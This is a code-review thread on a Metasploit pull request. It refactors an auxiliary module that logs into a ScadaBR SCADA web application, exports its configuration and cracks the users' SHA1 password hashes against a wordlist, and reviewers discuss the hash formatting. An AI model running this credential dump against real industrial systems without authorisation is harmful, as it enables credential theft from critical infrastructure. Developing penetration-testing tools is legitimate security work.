modules/auxiliary/admin/http/scadabr_credential_dump.rb

```diff
@@ -8,214 +8,242 @@ class MetasploitModule < Msf::Auxiliary
+    return unless File.exist?(wordlist)
+
     File.open(wordlist, 'rb').each_line do |line|
       @wordlist << line.chomp
     end
   end
 
   def crack(user, hash)
-    return user if hash.eql? Rex::Text.sha1 user
-    pass = nil
+    return user if hash == Rex::Text.sha1(user)
+
     @wordlist.each do |word|
-      if hash.eql? Rex::Text.sha1 word
-        pass = word
-        break
-      end
+      return word if hash == Rex::Text.sha1(word)
     end
-    pass
+
+    nil
   end
 
   def run
-    login datastore['USERNAME'], datastore['PASSWORD']
+    login(datastore['USERNAME'], datastore['PASSWORD'])
+
+    config = export_data
+
+    path = store_loot('scadabr.config', 'text/plain', rhost, config, 'ScadaBR configuration settings')
+    print_good("Config saved in: #{path}")
 
-    json = export_data
+    begin
+      json = JSON.parse(config.gsub(/\\r/, '').gsub(/\\n/, '').gsub(/\\"/, '"').gsub(/\\'/, "'").gsub(/\\\\/, '\\').gsub(/\\\r?\n/, ""))
+    rescue StandardError
+      fail_with(Failure::UnexpectedReply, "#{peer} Could not parse exported settings as JSON.")
+    end
 
-    service_data = { address:      rhost,
-                     port:         rport,
-                     service_name: (ssl ? 'https' : 'http'),
-                     protocol:     'tcp',
-                     workspace_id: myworkspace_id }
+    service_data = {
+      address: rhost,
+      port: rport,
+      service_name: (ssl ? 'https' : 'http'),
+      protocol: 'tcp',
+      workspace_id: myworkspace_id
+    }
 
-    columns = 'Username', 'Password', 'Hash (SHA1)', 'Admin', 'E-mail'
-    user_cred_table = Rex::Text::Table.new 'Header'  => 'ScadaBR User Credentials',
-                                           'Indent'  => 1,
-                                           'Columns' => columns
+    user_cred_table = Rex::Text::Table.new(
+      'Header' => 'ScadaBR User Credentials',
+      'Indent' => 1,
+      'Columns' => ['Username', 'Password', 'Hash (SHA1)', 'Role', 'E-mail']
+    )
 
-    if json['users'].empty?
-      print_error 'Found no user data'
+    users = json['users']
+
+    if users.empty?
+      print_error('Found no user data')
     else
-      print_good "Found #{json['users'].length} users"
+      print_good("Found #{users.length} users")
       @wordlist = *'0'..'9', *'A'..'Z', *'a'..'z'
-      @wordlist.concat(['12345', 'admin', 'password', 'scada', 'scadabr'])
-      load_wordlist datastore['PASS_FILE'] unless datastore['PASS_FILE'].nil?
+      @wordlist.concat(['12345', 'admin', 'password', 'scada', 'scadabr', datastore['PASSWORD']])
+      load_wordlist(datastore['PASS_FILE']) unless datastore['PASS_FILE'].nil?
     end
 
-    json['users'].each do |user|
-      next if user['username'].eql?('')
-
+    users.each do |user|
       username = user['username']
+
+      next if username.blank?
+
       admin = user['admin']
       mail = user['email']
       hash = Rex::Text.decode_base64(user['password']).unpack('H*').flatten.first
```

Comment:
Based on my understanding of our [`#identify_hash`](https://github.com/rapid7/metasploit-framework/blob/master/lib/metasploit/framework/hashes/identify.rb#L49-L50) function and our [wiki page](https://github.com/rapid7/metasploit-framework/wiki/Hashes-and-Password-Cracking) on the topic, this should actually be:

```suggestion
      hash = "{SHA}#{user['password']}"
```

This would ensure that the hash is properly identified as a raw SHA1 for cracking purposes.

Reply:
I'll fix this. This probably isn't the right place to use `{SHA}`. It should only be added when storing in the database. The output table already specifies that the hash is SHA1 in the column title `Hash (SHA1)`.

Reply:
Fixed here:

```ruby
        creds.merge!({
          private_type: :nonreplayable_hash,
          private_data: "{SHA}#{hash}"
        })
```